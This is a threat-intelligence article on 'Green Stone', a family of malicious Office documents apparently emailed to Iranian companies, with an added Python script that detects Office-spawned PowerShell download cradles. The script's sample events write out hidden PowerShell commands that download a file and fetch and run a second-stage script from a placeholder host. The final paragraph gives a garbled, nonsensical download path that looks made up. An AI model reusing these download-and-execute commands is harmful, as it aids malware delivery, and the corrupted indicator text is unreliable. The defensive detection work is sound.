
Green Stone

A few days ago, InQuest discovered a very interesting sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran, «Tavangoostar Niro va Gashtavar Jonob», and it also contains a link to that company. Since this family of malicious documents carrying embedded executables was not previously known, InQuest named it Green Stone.

InQuest also searched for related malicious documents. Analysis of those documents revealed that this type of document is currently being distributed to a number of Iranian companies by email.

The Green Stone family is made up of a number of documents with malicious code embedded in them. Their main function is to download and install malware on the victim's computer. The name "Green Stone" was chosen because the color green is clearly visible in every element of the documents: headers and footers, pictures, logos, and so on.

The primary feature of this malicious family is that it downloads files from a remote server through the PowerShell command line, without requiring any user interaction.
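The behaviour described above, an Office document launching PowerShell to fetch a file from a remote server, leaves a distinctive trace in process-creation telemetry: a PowerShell process whose parent is an Office application and whose command line carries a download cradle or an encoded command. The detection sketch below is an added example written for this page; it is not code from InQuest or AlienVault. The field names (ParentImage, Image, CommandLine, ProcessId) follow the Sysmon Event ID 1 layout, and the four log records are constructed for the demonstration.

```python
"""Flag Office-spawned PowerShell download cradles in process-creation logs.

Added example for this page; the records in SAMPLE_EVENTS are constructed,
not taken from the Green Stone sample. Field names assume Sysmon Event ID 1.
"""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Cmdlets and .NET members commonly used to pull a file from a remote server.
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|downloaddata|invoke-webrequest|\biwr\b|"
    r"invoke-restmethod|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# -EncodedCommand and its short forms, followed by the base64 payload.
ENCODED_FLAG = re.compile(
    r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE
)


def basename(path):
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or ''."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def classify(event):
    """Return the list of reasons this event looks like an Office download cradle.

    An empty list means the event is not of interest.
    """
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    if parent not in OFFICE_PARENTS or image not in POWERSHELL_IMAGES:
        return []
    reasons = ["office-spawned-powershell"]
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded-command")
    # Inspect both the raw command line and the decoded payload, so an
    # encoded cradle is caught just like a plain-text one.
    if DOWNLOAD_MARKERS.search(cmd + " " + decoded):
        reasons.append("download-cradle")
    return reasons


def scan(events):
    """Map ProcessId -> reasons for every event that classify() flags."""
    return {e["ProcessId"]: classify(e) for e in events if classify(e)}


def _b64_utf16(text):
    """Encode text the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry). example.invalid is a
# reserved name that never resolves.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/s.exe','C:\\Users\\Public\\s.exe')\""},
    {"ProcessId": 4188, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + _b64_utf16(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')")},
    {"ProcessId": 5002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -Command Get-ChildItem C:\Users"},
    {"ProcessId": 5100, "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": r"C:\Windows\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
```

The parent/child pairing alone is the strongest signal: legitimate Word, Excel or Outlook sessions almost never need to start PowerShell, so an alert on that pair is cheap and low-noise, and the cradle and encoded-command markers mainly serve to prioritise the alert. On a real host these records come from Sysmon or Windows Security event 4688 with command-line auditing enabled; without command-line logging only the first reason can be produced.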

The malware that is downloaded depends on the user's location. If the user is located in a country where the Green Stone family of malicious documents is unknown, a Windows calculator executable (calc.exe) version 5.0 is downloaded instead, from 12345678901234567890_example-11032014_31\downloaded\UNICORN\115238741244365920220391052710222372180656230659383785808

The purpose of this activity is clearly to gain a foothold on the computer from which arbitrary malware of any type can then be silently downloaded and installed.

Source: Green Stone - AlienVault - Open Threat Exchange
